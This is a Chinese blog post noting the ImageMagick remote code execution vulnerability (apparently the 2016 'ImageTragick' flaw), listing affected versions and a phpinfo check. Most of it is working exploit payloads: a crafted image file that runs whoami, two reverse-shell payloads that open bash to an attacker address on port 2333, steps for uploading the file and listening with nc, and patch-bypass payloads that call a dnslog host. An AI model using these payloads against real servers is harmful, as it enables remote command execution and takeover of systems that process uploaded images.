美文网首页
记录一下ImageMagick远程代码执行漏洞

记录一下ImageMagick远程代码执行漏洞

作者: migrate_ | 来源:发表于2019-05-17 16:23 被阅读0次
  1. 漏洞影响版本
    ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
    ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
    低版本至6.9.3-9 released 2016-04-30
  2. 通过 phpinfo() 即可,搜索 ImageMagick ,下图就是受影响的版本


    1.png
  3. 漏洞poc,保存成poc.png即可
push graphic-context
viewbox 0 0 640 480
fill 'url(https://evalbug.com/"|whoami")'
pop graphic-context
  1. 本地测试,查看是否执行whoami
convert poc.png 1.png
  1. 反弹shell(以下两个poc效果一样)
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/192.168.1.79/2333 0>&1"
pop graphic-context
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/1.jpg"|bash -i >& /dev/tcp/192.168.1.79/2333 0>&1")'
pop graphic-context"
  1. 将poc.png进行图片上传操作,先在你的攻击机(192.168.1.79)中输入命令nc -vv -l -p 2333对2333端口进行监听
  2. 顺带提一下猪猪侠提交的漏洞-优酷主站存在远程命令执行漏洞(ImageMagick补丁绕过)
#新的利用代码1
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|host image.99fd5e.dnslog.info'
pop graphic-context
#新的利用代码2
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|host image.99fd5e.dnslog.info"
pop graphic-context
  1. 利用 http://ceye.io/payloads 这个平台

相关文章

网友评论

      本文标题:记录一下ImageMagick远程代码执行漏洞

      本文链接:https://www.haomeiwen.com/subject/txjoaqtx.html